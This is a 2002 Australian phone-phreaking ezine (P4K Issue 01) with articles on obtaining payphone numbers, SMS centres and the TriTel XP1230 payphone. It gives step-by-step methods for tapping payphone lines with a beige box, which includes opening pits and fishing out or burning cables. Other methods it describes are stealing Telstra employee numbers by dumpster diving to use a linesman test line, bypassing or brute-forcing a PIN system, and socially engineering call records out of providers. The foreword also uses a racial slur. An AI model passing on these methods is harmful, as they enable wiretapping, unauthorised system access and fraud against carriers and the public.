Copy Link
Add to Bookmark
Report

P4k Issue 01

eZine's profile picture
Published in 
P4K
 · 5 years ago

Foreword

We are finally here a Wednesday night and the release of Issue Number One. It took longer than expected to get out, half because people keep promising articles and they never delivered them, and also because it took longer to get eveything happening than I thought that it would be. In the end most of these articles can be found on the respective author's websites for that exact reason. But as Zaleth said its better to have it all together in one area and hell this will *hopefully* get abit more coverage than the people's websites. Bleh, anyway here it is and I must also say a way big thank you to: Everybody that submitted articles- Zaleth, phreakaz0id, rioter, sangoma and head_rush. Also people who have encouraged me, helped me etc. etc. These people are mainly the guys that are found in #P4K on irc.linuxphreaks.org 6667, yeppa thats right these are the guys that love social ladder climbing or some bullshit like that. A finally a big big thank you goes to anomaly. he was kind enough to help edit the zine and was very very helpful with ideas. Thats it for me, so catch you niggers later. Half of this is probbly written in the introduction. Peace.


Phreak For Knowledge Issue Number One..
11/07/2002
<Note: No ACSII heading if anyone cares to give>

[00] Contents

  • [01] Introduction :::::::::::::::::::::. [P4K]
  • [02] Websites :::::::::::::::::::::::::. [P4K]
  • [03] Getting Payphone Numbers v2.0:::::. [Zaleth]
  • [04] Reverse Lookup Directory::::::::::. [Zaleth]
  • [05] SMSc :::::::::::::::::::::::::::::. [Rioter]
  • [06] TriTel Payphone Information ::::::. [phreakaz0id]
  • [07] Paranoia & Being Paranoid Pt.1::::. [head_rush]
  • [08] NPR(Non Phreaking Related) :::::::. [Sangoma]
  • [09] Outtro :::::::::::::::::::::::::::. [P4K]
  • [10] Other Crap :::::::::::::::::::::::. [P4K]

[01] Introduction

Now that we are getting closer to the time that we actually release this (master)piece of peoples work, I am rewriting the introduction. The last introduction I did even before the zine had any information in it at all. It was going to be a very small file containing just basic shit, that would help people along. As we come to the end, I didn't get one or two articles that I wanted to but the file is much bigger than I expected, at the current time of writing it is like 105kb. Now thats not too bad at all for a first release of any ezine, meaning that the articles come out much more detailed than I first thought, but while still being able to teach people the basic information.

This was originally meant to released around the end of May, but we just didn't get it out in time and now it is coming out a little bit later. we still want to release at least every two months, maybe even once a month, this is a strain on the people that write the articles (and edit -ed ;) and I understand that they have other things they need to do(i.e. Have a life) so we'll just see how it comes out. The last thing I want is for a shit zine to come out just because we don't have enough information, but I also don't want a zine that comes out like every 8 months or some crap like that. I would also like to stress this is designed at the more basic subjects, we hope to advance in the shit that we write, but we aren't in anyway saying that we are elite as what is written in the PhreakAu zine, but we hope to give people the information so that they can get to that level.

Really in the end, there should be no competition between people to decide who is the "elitest", there should be no flaming, no time wasting and no people asking about free calls and the usual crap like that. In the end the only reason you should need is the thirst for information, to learn and to advance the whole Australian Phreaking Scene rather than just yourself. The resources, skills and information you pull with more than one person is amazing, as well as the different ideas/views a person can bring to a subject. Hmmm, now I think that I am crapping on abit. Before you go on to read(learn) I hope that you appreicate the time and effort that people put into doing these articles and compiling this zine. If you want to knock it, first write something that is better, and then maybe you can go about knocking it. Enjoy... and most importantly LEARN!!

[02] Websites

Listed below are websites that we believe have important information or help in forwarding the Australian Phreaking Scene.

.::P4K Site::.
:: http://p4k.wiggerz.net/ ::

.::Ausphreak Forum::.
:: http://forum.onecenter.org/ausphreak/ ::

.::PhreakAu Homepage::.
:: http://pinegap.net/phreakau/ ::

.::Zaleth's Site::.
:: http://zaleth.wiggerz.net/ ::

.::phreakaz0id's site::.
:: http://www.angelfire.com/freak/az0id/ ::

.::g0dfray's Site::.
:: http://www21.brinkster.com/shadfray/ ::

[03] Getting Payphone Numbers v2.0

[Zaleth]


- Introduction -

I wrote v1.0 on 19/Aug/2001 so since its May its time for another update. Not too much has changed in the past 9 months, a few new ANI numbers and a few blockages the Australian scene has observed.

I will keep v2.0 detailed and I will include audio which shall rev the future of html based tutorials to the max :D Anyway I will include my original introduction because I simply can't think of anything to write in here except how much the scene has lifted and how I hate MTMS for updating all the X2's so they all block iPrimus DCX.

This file is intended for Australians who are just starting out in the phreaking world. This file is for educational purposes only. One of the first questions I get is how to get Payphone numbers such as for Smart Phones and Blue Phones. There are around 15 types of payphones in Australia wether they are domestic or public. This file will show you various methods of obtaining a payphones number. I know this tutorial has been done dozens of times but I want to make this one easier and more informative than the rest :)

Enjoy.


- Contents -

  • I) Cabinet Identifiers
  • II) Collection Methods
    • a) 0016 000 000 Number
    • b) Beige Boxing
      • i) Plans

    • c) FAST (Best way)
      • i) Work Arounds
      • ii) Tone Dialler
      • iii) Darkthief's Method
      • iiii) Using

    • d) Primus DCX
    • e) ANI
    • f) Calling Card

  • III) What to do with Payphone Numbers
  • IV) Ringing Payphones
    • a) Smartphones
    • b) TriTels

- I: Cabinet Identifiers - Key Terms -

I will be using the Cabinet identifiers for each of the phones so you will learn there two letter cabinet numbers for the phones now! This has everything! When I mention a Gold Phone I will call it a GP because Credit Phones and Gold Phones have the same cabinet numbers.

Also not all phones will be mentioned in this text so some are just here for you to learn about.

Blue Phones: L6, L5
Credit Phones: C4
Card/Eftpos Phone: B1, B2
Dorro Phone:
Gold Phones: C4
Green Phone: M6, M7
Multimedia Payphones/MmP: K2
Phonecard Phones: P1, P2, S1, S2
Red Phone: L5
Smart Phones: X1, X2, X7, Y1, Y2, Z1, Z2
TriTel Phones:

Other unknown: C1, T2


- II: Collection Methods -


-- A: 0016 000 000 --

[Sound Recording]

The 0016 000 000 number is out of date and if you try this method you will find that the three digits that you're after at the end of the call will be cut off. This method also costs 40cents which is a major piss off.

If you want to use this method you dial 0016000000 on the payphone then wait until the guy stops talking, now get your pen ready and write down any numbers mentioned after "SCANTS SCORESBY" which will be read out by the telstra lady. Once you have the three digits the only ones you will be interested in are the last two digits.

Look on the payphone or if its an X2 on the left hand side on the poster. You will see a number, for this purpose I will say its: 9321 45X2 and lets say the code I got from the number was 168

Firstly throw away the first digit you don't need it. Now this is where you year 2 maths comes in handy.

The code I got was 168 so I get rid of the first digit to leave 68.
6 + 1 = 7 , 8 + 1 = 9

So now we have found that the last two numbers of the payphone is: 79 making the number 9321 XX79 . Now here comes the time consuming part, you will need to scan 99 numbers to find the payphone number its recommended you do this from a payphone so you won't be found. When you trying to find the number listen either for the phone to ring, or on your phone it may be engaged or the phone may display Service Unavailable. I personally don't use this technique because its a waste of time.

With this number you can also use, 001618129773868 or any other international number which darkthief pointed out.


-- B: Beige boxing --

This is a simple way but can be dangerous depending on the time of day.
You can easily obtain a number this way and you can easily be caught.

Firstly you will need to construct a beige box, there are hundreds of plans out there so it shouldn't be hard to find, I have added my plan into this tutorial to save time.

Next you will need to open the pit near the phone and connect up your beige box, depending on the wires connect your beige box's wire to the red wire and the green wire to the green wire. I havn't beiged in ages so I have forgotten the combination for the blue and white wires, you should be able to figure it out in a matter of seconds. Once connected, use the iPrimus DCX number which is 1800 855 747 when the lady starts talking press ** (This auth exploit was found by me ;P ).

Also if you have time put black electrical tape around the exposed wires seperatly. Then burn the tape a little bit so it seals.

I will be discussing more ANI numbers later on in this tutorial.


-- B:i: Plans --

Well I would recommend everyone has one of these they are so handy, you can use them at home if your wall mount is stuffed etc. I made a diagram to make it easier for visual learners such as myself to learn off. Anyway heres what you need.

  1. A phone.
  2. A pair of pliers.
  3. Two alligator clips.

As you can see this is the poor arse way of making the box because the soldering irons cost a crazy $20 :D

For this part refer to the diagram below the text.

  1. Open up the plug
  2. Remove the yellow and black wires or you can just leave them in.
  3. Remove the floor, or you can keep it on and when you finish the clips stick out the end of the plug.
  4. Grab the two alligator clips and slid the onto the copper and get the pliers and tighten the metal walls on the clips so it tightens.

Wolla you have your very own beige box now wasn't that easy?


-- C: FAST --

FAST Stands for Field Automated Subscriber Testing which is a testing number for Telstra linesmen, so do not abuse this number.

This is one of the two ways I use to obtain numbers its easy to use and takes under 1min to obtain a number.

Pick up the receiver of the payphone and dial: 1800 050 051 then you will hear the Telstra lady go "Welcome to FAST, Telstras field test facility, Please enter your employee number followed by your pin".

Ok the hard part is getting a telstra employee number and pin, the best way is to go trashing/dumpster diving at a telstra exchange the night before rubbish collection. Look for any pay packet letters because they contain the employee numbers, and you will have to use your own resources to find the pin number.

Once you have accessed FAST's main menu press 1 then the telstra lady will say "The line to be tested is xx xxxx xxxx" now you have got it!


-- II:C:i: Work arounds --

So the payphone has blocked FAST or DCX? well here are some handy work arounds. These are intended for you to use of course and to spark ideas for finding more work arounds.

Note: FAST gets used as an example, you can use any other blocked number.


1) Tone dialler

This is a simple way you can buy a Tone dialler from Tandy for the price of a big mac because they are being discontinued.

Pick up the handset dial 1800 on the phone then hold the tone dialer to the mouth piece and dial 050051 and you will be connected in no time.

You can also use your mobile phone as a tone dialler make sure DTMF is enabled on them.


2) darkthief's method

This is by far the best way to use the work around because you don't require a tone dialler.

Pick up the handset, dial 180005005 then press the Follow on button then * (star) followed by pressing 1. You will get connected, also a week after Dark Thief released this work around I found two phones which had blocked it, this shows Telstra is watching us. What happens is when you press the * you will get an engaged tone so you can't go no further, we will have to fix that.

This method works on X2's and P2's (The only phones with the block).


3) Godfrays method

This way is the newest of them all, another great vibe to this method is that after the # key the digits are hidden.
So this is what you do:
Pick up the handset dial 18000500 press # wait and then dial 51 now you will be connected to fast in no time :P


4) Credit/Eftpos Phones

This technique was found by myself, a few people couldn't figure out how to get a B2's phone number so I had to make my way to the airport to figure her out and this is what i came up with in 2mins.

  1. Pick up the receiver.
  2. Hold down SERVICE CALL button.
  3. Dial in the service number (e.g. DCX &/or FAST).
  4. When asked for Authorisation hold down the SERVICE CALL button and input what ever is necessary.

-- II:C:ii: Using --

Some phones are so out of date that you can't access the fast menu so you will require a tone dialler. Lets use the GP as an example you dial 1800050051 input the employee number and pin but your unable to connect.

Now this is the part where your tone dialler comes in handy, dial 1800050051 wait until your asked to input your acquired employee number and pin. When the telstra lady asked pick up your tone dialler and hold it up to the microphone turn it on and type away. Simple isn't it?

Another alternative is that you can use your mobile phone as a tone dialler, lucky because you cannot buy tone diallers now because they have been phased out by telstra saying that people combine the keys to make a bluebox, how ever the mobile phone must have dtmf keys enabled.


-- D: Primus DCX --

This is another favorite method of mine and its really quick aswell, pick up the phones handset dial 1800 855 747, you will here a person talking about another number 1300 855 747 but don't worry about that.

When the person finishes talking you will need to enter a four digit pin then press * (star). You will hear "Welcome to the iPrimus DCX" blah blah blah, its a strange system and you should just wait until you hear "ANI" and the number will be read out straight after.

There is a very simple way around the pin system. Since in computer terms * is a wild card you do this. "Please enter your pin" press ** and you will be connected in no time ;) or use a pin darkthief found 6126. There are more DCX numbers out there byt they are safe guarded away from the public because in a May MTMS update Telstra blocked the 1800855747 number, but just use one of the Work Arounds to overcome this block :P

(Ed: Since the Zaleth writing/submitting this article the Primus DCX has been patched so the exploit of using ** to bypass the login doesn't work anymore. So now you will haveto try to bruteforce the logon. These sort of things happy due to abuse and public posting of the details on such areas as the AusPhreak BBS, where it is known to be monitored by Telcos employees/pigs. So just be careful and wise what you post.)


-- E: ANI --

ANI stands for (A)utomatic (N)umber (I)dentification.

When you dial a ANI number the number will be read out for you to record. Isn't this nice ;)

Here are the ANI numbers, just simply dial them. The 127 numbers don't work on payphones such as X2's and P2's because they have been blocked by the phoneline itself, the name for a payphone phoneline is called "EQL".

ANI inc. mobiles: 018 018 222
Telstra ANI: 127 22 123
Telstra ANI: 1800 801 920 <=- Found by me ;P
Optus ANI: 127 23 12
iPrimus DCX: 1800 855 747


-- F: Calling Card --

This was mentioned in a eZine, go and buy either a Optus, Primus or Telstra calling card. Now once you have it go and make a couple of phone calls from the payphone, then the next day ring up the card provider lets say Primus and say you made a phone call yesterday. Now here comes your social engineering this isn't hard tell them you made a call yesterday and ask for the record for the number of the calling party and the number of the called party.

This method is a waste of time, so there is no point in going to these lengths in getting a simple payphone number.


- III: What to do with Payphone numbers -

So you have acquired a payphone number and now what you ask? Well there are many things you can do, you can call the payphone up and talk to the random person who picks up.

You can call the payphone and organise someone to be there at a certain time to talk to you etc, the list is endless if your doing the random talker be creative act bogan confuse the person and make sure you get a good laugh out of it.


- IV: Ringing Payphones -

Payphones ringers are being disabled so they don't ring because Tel$tra are paranoid about drug lords using their payphones as selling points etc. Now lets piss Telstra off with out work arounds :D


-- A: Smartphones --

This method was found by me, it is difficult to get to work first time but just takes practice, ring the smartphone pickup the reciever press [OK] and press 3 keys eg. 1 4 8. Now you have enabled a two way chat the OK button accepts the phone call and the three dtmf keys enable the microphone so you can talk.


-- B: TriTels --

Personally I've never had to ring a TriTel so I'm going off what I have read and discussed with Phreakaz0id the TriTel king.
Ring the TriTel the LCD screen will display
"Thank You. Please Insert Money/Coins" and when the receiving party lifts the handset the call will cut out, they must hangup and pickup again and you will hear a long beep during which you (the caller) can speak down the phone. How ever you will only hear a hollow sound. Ok now Ring the TriTel, Reciever picks up and hangups and picks up again now the reciever presses three DTMF keys so the microphone activates (Pressing three DTMF keys is an old trick for enabling the mic).

[04] Reverse Lookup Directories

[Zaleth]


- Introduction -

Reverse Lookup's are very easy to get your hands on it just requires your time in extracting the directories major databases with limited resources.

Recently in the news, DtMs Phone CD have been in the courts for copyright infringements. Now this may effect future releases of this CD or it just be Tel$tra being bastards about a little competition in the whitepages/directories game.


- Equipment -

You will need the following to pull off making a nice reverse lookup:

1x DtMs Phone CD
- This CD you can purchase at your Office Works or Tandy and Dicksmiths. I recommend you phone up the shop before you wonder in, they may not have it.
2x One Computer

DtMs Phone CD costs $20 however this version does not come with the reverse lookup, but you can pay an extra $100 if you really want to be slack. So just buy the $20 version and put in a little effort and you will have a reverse lookup for $20 not $120.


- How its Done -

Right you have all your required equipment excellent. DtMs Phone CD comes with software called "Marketing Pro" I want you to install this program because this is going to be your database stealer.

Once installed marketing pro, there are fake database's in it's directory, swap the databases off the CD with the fake databases; just replace them/over write them.

Once done, run Marketing Pro and click on residential or what ever type of lookup you would like and do a wild search (for those who don't know what I'm talking about a '*' search without the quotes).

You will recieve a huge listing, now you want to export this database, you simply use the menu's in the navigation bar and export the database, the database when exported is over 1gig, so make sure you have lots or free space, my database is 1.2gig so be very prepared for a large file.

One draw back is that you may start using other programs while the database is saving, let me say this don't because marketing pro will stop responding and you will loose your database. Depending on the speed of your computer exporting the database can take up to 20mins.


- Searching -

Ok this is where the fun starts, when I search my database i just use grep in linux because its allot easier, how ever for the people stuck in windows there are alternatives you can download "cygwin" which is pretty much linux in a dll which has grep.

Or you can create your on program to search on the database I'm happy with my command line:

$ cat rlook.db | grep 08-9331-4765

[05] SMSc

[Rioter]

There has been a rather large increase in smsc lately mostly to do with the fact that people think they can get free sms's from them this was true due to the fact that a flaw in the way they were set up i belive you wouldnt get billed correctly if you changed the smsc number to a number that was not of your network. This however like many things was fixed cause of over use now it is very rare to find a working one because most networks have now barred people from out side their networks from using that number but remeber "free sms's grow on trees" hehe now every one has an instrest on the free sms side but not to many people know what they are and how they work well here goes if anythings wrong not my fault blame multiple web sites and some stupid techies.

The best way to think of a smsc is a gateway usually a big computer with a smsc software installed and uses a method called store and foreward if the phone that you tried to send to is off or out of service range it stores it on the server and tries to resend if it is stored their for a set period of time it is deleted and if their is no problems is forwared to your phone. a smsc does not always have to send to a phone it can be sent as a fax email or can be used to control some phones wap functions (might want to look for an exploit there) now the problem with sms's is that each network has a different protocall and the smsc checks what the network it is going to and if it need to goto a different networks smsc sends it to it and then the other networks smsc changes the protocalls and then stores or forwards the sms respectavly so it can take some time...

Well due to lack of time I have to been able to go into the detail i would have liked but i hope that clears any questions you had if you have anymore questions feel free to email me
RiOtEr

[06] TriTel Payphone Information

[phreakaz0id]

(ed: I lub the mad ascii skill0rz for the heading :P)

                   ÈfffffffffffffffffffffffffffÈ‚˜ 
È È ÿ
È TriTel XP1230 È ÿ
È Handset Un-Mute & È ÿ
È Other Payphones È ÿ
È È ÿ
È [ Version 1.0 ] È ÿ
È È ÿ
È ~pHreakaz0id~ È ÿ
È È ÿ
È˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙È ÿ
¬‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚‚P

Contacting the elusive -=pHreakaz0id=-
>> Aust Phreaking Forum <<
>> phreakaz0id@hotmail.com <<
>> #ausphreak,#p4k on Linuxphreaks.org <<
>> http://www.angelfire.com/freak/az0id <<

"The future is not a single national voice network with limited connection to the outside world. It will be a mass of interconnecting networks, under many different ownerships, of different geographical spreads, offering voice, image, text and data services from which the customer can choose quickly and easily."

- Tom McKinlay, DG XIII, Eurpoean Commission [DeBony]

Contents

  • Summation - "TriTel XP1230 Handset Un-mute & Other Payphones"
  • TriTel Payphones - The Un-Mute
    • I. Un-Mute Method for the XP1230
    • II. The Theory
    • III. Dispelling the Myths

  • TriTel Australia - The Specs
  • Protel International & the TrendTek connection
  • The Protel XP1230 Payphone - Specs
  • Understanding the Payphone Line
  • I. Payphone Lines
  • II. Accessing the Line
  • III. Pricing
    • Appendix 1 - PayTel Australia
    • Appendix 2 - Siemens Payphones Australia

  • I. Cityphone Compact
  • II. Easyset Entry
  • III. Telstra Interset 751
  • IV. Diamond (L6 Bluephone)
  • V. Elasa (Telstra X1/X2)
    • Appendix 3 - DORO Zircon Payphones
    • Appendix 4 - Vector Technology Corporation (VTC)
    • Appendix 5 - Metalwork, Heat Treatment, Tempering

  • I. Silver Solder Gaff
  • II. Lock Picks
    • Resources & Links

Somewhere in Australia
May 2002

Tucked away in wooden enclaves or against cement-rendered walls flanked by bright green palmettes we find the TriTel sitting proudly upon its metallic throne. Encased within its plastic aegis, the first TriTel I layed eyes upon beseeched me to lift its Electro-dynamic handset and finger the delicate yet manipulable keypad as I would a sweet-scented woman.

Enough with the shit, on with the show ...


Summation - "TriTel XP1230 Handset Un-mute & Other Payphones"

This article basically covers the method of UN-Muting a TriTel payphone handset for clear Two-Way Communication with your accomplice, or whomever has called the phone. It also contains vital information pertaining to these new payphones seen frequently throughout all major cities in Australia. They are particularly fond of Westfield Shopping Centres and have been known to congregate within a variety of other Malls and the like on numerous occasions. Recent sitings of TriTel herds have been reported in Universities throughout Sydney and strays have been spotted roaming at the occasional public venue.

Appendices at the end of the document contain details and various information on other exotic and rare payphones throughout Australia.


TriTel Payphones - The Un-Mute

I. Un-Mute Method for the XP1230

(i) From the Caller's point-of-view: When an External party dials the number for the payphone, they will hear two rings followed by a long beep. After this beep the Caller stays connected to the payphone for a period of approximately 2 minutes.

  • Anyone attempting to use the payphone will find that they cannot dial out since there is an incoming call occupying the line. The External party at this point will hear only a hollow sound.
  • If anyone lifts the handset at the payphone the External party (or Caller) will hear various clicks as it is being manipulated at the source and can actually listen in on the DTMF being played down the line as the End User attempts to dial numbers on the keypad (however, there several seconds of delay between when the DTMF was heard at the payphone and when they are heard by the calling party).
  • Whilst in this mode the Caller can actually speak to the Receiving party (at the payphone) but cannot hear any replies as the handset is still muted.
  • The Calling party remains connected for 1 or 2 minutes as mentioned earlier, they will stay connected for the duration of this period even if End User's at the payphone lift the handset and attempt to hang it up or disconnect the incoming call. As with telephone lines the Calling party has precedent over the connection of the call.

(ii) From the [Payphone] End User's point-of-view: When the external source is ringing the payphone, for the first two rings there is no indication that a call is coming through. Once the external source hears the long beep, the LCD screen at the payphone displays "Thank You. Please Insert Money/Coins".

  • If the Receiving party (person at the payphone) lifts the handset *before* the long beep (ie. during the first two calls only heard by the Caller): then they automatically "by-pass" it.
  • If the Receiving party lifts the handset *during* the long beep: they are able to hear the Calling party if they speak loud enough over the beep, but cannot reply as the handset is still muted. Sometimes the Receiving party is cut-off when they first lift the handset, see the following point for details.
  • If the Receiving party lifts the handset *after* the long beep: they will be automatically cut out, he/she must then depress the hook-switch and lift the handset again (or press Follow-On in some cases).
  • At this point the End User at the payphone can hear everything at the other end of the line but cannot be heard by the Caller. They must dial any random 1800 (Free to Caller) number. After a short pause of 2 or 3 seconds the handset is un-muted and both parties can have a continuous conversation minus interruptions by clicks, beeps or time-delays.

II. The Theory

When studying the XP1230 one begins to understand how it is possible that the Un-Mute method described here actually works. As will be detailed later on in the article, there are several outstanding features that make this payphone distinctly different to that of its rival the Telstra X2 Smartphone.

TriTel payphones work on ROA [R]eversal [O]n [A]nswer, which basically refers to the line polarity being reversed when a number is dialled thus unmuting the handset and charging the End User accordingly (Free to Caller numbers are obviously recognised as such and the payphone cannot charge you). (For further discussion on this matter See the chapter Understanding the Payphone Line).

The payphone is an American Protel XP1230 model which has its own internal recognition software that analyses the actual number itself against the time of day & day of the week with a charging table - this is known as Self-Tariffing.

The reason why the Un-Mute Method works is because when the End User dials the 1800 number, the payphone itself (as an individual entity and not via CLM) analyses the number that was dialled against the time of day and the charging table, within those few seconds it realises that the number is Free to Caller and this is where ROA comes into play. The line polarity is reversed, no money is taken (since it is free) and the handset is un-muted to allow the number to connect. Obviously, the number cannot connect since there is already a call occupying the line.


III. Dispelling the Myths

Over the past six odd months the TriTel payphone discussion has reached a climax, during that period many myths and misconceptions were distributed by pretentious neophytes and other undesirables. Provided are some brief points outlining what, in my extensive experience, are known to be fact:

(a) TriTel XP1230 Ring-tone: this does *not* exist. I have heard of reference to some TriTel payphones in Canberra that are alleged to have a ring tone much like a "hushed" L6 Bluephone. Since there is no evidence to the contrary, the current status quo stands that when TriTel phones are rung the only external indication that there is an incoming call is a message on the LCD screen reading "Thank You - Please Insert Money".

(b) The following payphones *cannot* call a TriTel XP1230 payphone for various reasons:

  • Telstra X1/X2 Smartphone (Siemens Elasa)
  • TriTel XP1230 (Protel)

When one attempts to dial a TriTel from another TriTel, the line is immediately disconnected but the Calling party is charged 40 cents for the call before it drops out. X2's on the other hand are completely barred from dialling a TriTel XP1230 in some areas, but the vast majority are not barred from calling other X2 Smartphones.

(c) TriTel payphones *cannot* accept Telstra Phonecards: this is true. Even though the XP1230 is infact quite capable of doing so, Telstra has barred access. For further discussion on this matter and consultations with the ACCC, see the link provided at the end of the "TriTel Australia - The Specs" chapter.

(d) Yes, using Bankcards in TriTel XP1230's is perfectly acceptible, there are numerous signs on both the payphone itself and the stand indicating this.

(e) Free To Caller number the Called Party dials to Un-mute the handset can "eavesdrop" on the conversation: this is *untrue* and was confirmed after extensive discussion with numerous phreakers on the Aust Phreaking BBS and over the phone. The XP1230 is Self-Tariffing rather than utilising Customer Loop Metering (See Understanding the Payphone Line) and is designed to analyse the number dialled against the time of day and a pricing chart. Since the number is Free to Caller (ie. 1800-xxx-xxx) the payphone is tricked into un-muting the handset, something which occurs via reversal of the line polarity when the called party lifts the handset - although in this situation the called party is the payphone itself and the handset is already off the hook. Due to the fact that the line is already occupied with a call between the external source and the called-payphone, it cannot actually connect the 1800 number the End User dialled.


TriTel Australia - The Specs

John Bucknell - Managing Director
TriTel Australia Pty. Ltd.
135 Darling Street, Balmain East, Sydney 2041 NSW
Ph: (02) 9810 0146 Fax: (02) 9810 2780
E-mail: tritel@ihug.com.au

  • Who: TriTel Australia is the only major alternative to Telstra for public payphones in Australia (see Appendices for others).
  • Evolution: Over the past two years TriTel Australia has expanded from operating payphones in major shopping centres throughout Sydney and in South Eastern Queensland, to entering the payphone market across Australia. They are found in Universities, shopping centres and a few public locations in almost every State and territory.
  • Payphone: TriTel use an American payphone that was proven in the USA to be "highly vandal resistant" - the Protel XP1230.
  • Objective: Deliver real benefits to the Australian public by offering substantially better rates than Telstra payphones. Compete with Telstra's long-standing monopoly of the payphone industry.

For further discussions on Telstra's smartcard technology trial and its associations with TriTel paphones see "ACCC To Monitor Negotiations Over Payphone Service":

- http://www.accc.gov.au/media/mr1999/mr-185-99.htm


Protel International & the TrendTek connection

TriTel Australia makes use of the American payphone produced by Protel International, one of the major US payphone manufacturers. The payphone itself was provided through a contract with TrendTek Australia, the supplier of telecommunications products to major carriers, service providers and retail organisations throughout the Asia Pacific region. TrendTek receive the Protel XP1230 model via Galaxy Payphones (Supplier Code N1141). In addition to supplying TriTel with their payphones, TrendTek supplies various products to organisations such as Telstra, Optus, Alcatel, AT&T Australia, Ericsson, Australia Post and Queensland Payphones.

The particular model utilised by TriTel is titled the Protel XP1230 and supports a variety of payment methods and access network connections. Network connection of the various payphones TrendTek offers can be provided via:

  • Conventional PSTN copper links
  • Cellular Wireless Networks (GSM, CDMA, AMPS)
  • VHF/UHF radio links
  • Digital Pair Gain systems

Beneath the vast majority of these payphones - just under the cash box to be precise - is a sticker with the following details: "Galaxy Payphones (Supplier Code N1141) TrendTek Australia".


The Protel XP1230 Payphone - Specs

The Protel XP1200/1230 Payphone offers a variety of payment options: magnetic stripe, microchip and coins/tokens. The XP1200 model is a coin/token payphone only; the XP1230 model upgrade (distributed in Australia by TrendTek and currently utilised by TriTel) offers both coins/tokens and card technology.

Features:

  • Line-powered, loop start. 48 VDC line voltage, 20 mA minimum.
  • Two Protel [Remotely Programmable Electronic] Coin Scanner models are available: ECSII: Accepts coins of up to 27 mm in diameter with a max. thickness of 2.8 mm. ECSV: Accepts coins of up to 33mm in diameter with a max. thickness of 3.3 mm.
  • Reads all chip cards conforming to ISO 7816 and magnetic stripe cards Track 2 conforming to ISO 7810 to ISO 7813.
  • Optional SAM authentication (5 slots).
  • High Contrast Liquid Crystal Display of 2 lines x 20 characters per line, 9 mm character height.
  • Electro-dynamic handset [High Impact Poly-carbonate], hearing aid compatible with internal stainless steel lanyard with pull strength of 450 kg.
  • Rugged, Vandal-resistant Construction & Stainless Steel Faceplate
  • Magnetic Proximity Hookswitch
  • Six function keys for Language selection, Volume amplification, New Call [Follow On], Redial, Change Card, and Emergency number. [The last three keys are not yet operational in Australia - pH.]
  • Encased state-of-the-art electronics for physical and ESD protection.
  • High Quality Anti-drill Locks
  • 4mm Stainless Steel Vault Door
  • Anti-stuffing Coin Return
  • Call Subscriber Answer includes line reversal, 12/16 Khz, 50 Hz pulses, DTMF tones.
  • Bi-directional communications with the ProNet Payphone Management System for Call Detail Records and multiple alarm detection.
  • All payphone features, including Operating System, are downloadable from the ProNet Payphone Management System.
  • Self-Tariffing - TriTel Australia does not utilise CLM to operate its payphones. It analyses the dialled number against the weekday, time and a charging table to determine the call cost.
  • Service Difficulties - dial 1800 181 922
  • Utilises 1800 REVERSE (1800 738 3773)
  • Directory Assistance - Local: 1223 - International: 1225

Understanding the Payphone Line

I. Payphone Lines

Standard payphone lines differ in several ways to that of a normal telephone line. In this section I will attempt to outline the main features which distinguish its line configuration.

(1) Dial Tones: Payphone lines have a 60-second dial tone; as opposed to normal lines which have a standard 10 seconds (allowing customers time to insert money and dial).

(2) ROA (Reversal On Answer): refers to the reversal of line polarity when the called party lifts the handset. This is necessary to indicate to the payphone when it should take the money, un-mute the handset and allow two-way conversation.

(3) CLM (Customer Loop Metering): refers to a mechanism for charging calls to mobile phones, long distance and so on. For each timed period the exchange sends a pulse which is used to signal the payphone to deduct another 40 cents (1 meter pulse = 1 local call). Telstra payphones require these meter pulses to operate - this includes their Customer Operated L6 Bluephones and C4 Goldphones.

(4) Self-Tariffing: the [Protel] XP1230 TriTel payphone does not utilise CLM to operate. Instead, it is Self-Tariffing - essentially having its own intelligence, which allows it to analyse the dialled number against the weekday, time and a charging table to determine the call cost which is then displayed on the LCD.

(5) Pre-selected Carrier Barring: the oppressive corporate giant that is Telstra did not allow payphone lines to be pre-selected to any other carrier during the pre-2000 era. In effect, tens of thousands of L6 and C4 operators pay full retail rates for each call. In March 2000 Telstra agreed to create a new line after consultation with the ACCC, it was to be identical to the standard payphone line, minus CLM.

(6) Payphone Lines vs. Normal Lines: payphones such as the TriTel XP1230 utilise a Telephone-style 12 Core cable; whilst the common line you will come across in your own home is a Normal, Austel Approved, Telephone Cable Flat 4 Core. Depending on the area you are in, the copper wires you require for beige boxing are Red and Green or alternatively, White and Blue.


II. Accessing the Line

The vast majority of TriTel XP1230's you will come across are encased in a stand rather than a booth. In many instances the aperture between the stand and the wall it is backed against can vary from a centimeter to an inch. If one is able to locate an easily accessible stand with at least one inch of space, gently pry it slightly wider and take a peek behind the metallic hull. You will notice several chords leading from both the mid-section of the payphone and higher up.

(a) White: the thickest chord (several millimeters short of a centimeter in diameter) encased in corrugated white plastic, is the power source. Do not cut this line.

(b) Blue: thickness of a standard pen, this houses the phone line and is known as a Telephone-style cable, 12 Core.

(c) Green-Yellow (striped): several millimeters in diameter, the thinnest; this is the insulated Earth copper wire.

(d) Black: some TriTel payphones I have come across have a black telephone cable instead, it is a Flat 6 Core cable and is accessed via a hole directly underneath the phone itself but in the actual stand, roughly 5cm in diameter.

(e) Grey: this is also an additional line found inconjunction with Black 6 Core cables on some TriTel phones and is accessed via the same hole as mentioned above. It is understood to be the Flat Earth copper wire in some areas.

If you are able to see the phoneline or ascertain its location, it is possible to create a nice hook out of worked silver solder in order to "fish" the chord out from behind the stand for beige-boxing. (See Appendix 5 - Metalwork, Heat Treatment, Tempering to create your own "gaff").

WARNING. Please make sure you are very certain the line you are about to strip is definitely the telephone line. Colours vary in different areas as I have illustrated above (See d. and e. for some examples of alternatives). A simple, yet effective, method of getting to the copper wires underneath the insulation *instead* of stripping the line or slicing them length-wise with a knife, is to burn off the plastic with a lighter. I *will not* take responsibility for anything you attempt to do based on what you have read - you do so at your own risk.


III. Pricing

As mentioned earlier, the corporate behemoth, known as Telstra, charges full retail rates to all payphone operators who are connected to their network. Their payphone division pays an estimated 12 cents per meter pulse, (1 meter pulse = 1 local call). Payphone Operators are thus unable to offer better rates to the End User due to the method by which they are charged.

TriTel payphones do not need meter pulses to operate (they are Self-Tariffing) and are thus able to pre-select to other carriers, theoretically able to offer better rates.

Due to Telstra's control of the Phonecard market (for alternative phonecards see Appendix 1 - PayTel Australia) and their barring of TriTel from allowing the XP1230 to read Telstra SmartCards, TriTel has come out with their own brand of Phonecards which are available at various Newsagents in certain regions of the country, at this writing they are still hard to come by.


Appendix 1 - PayTel Australia

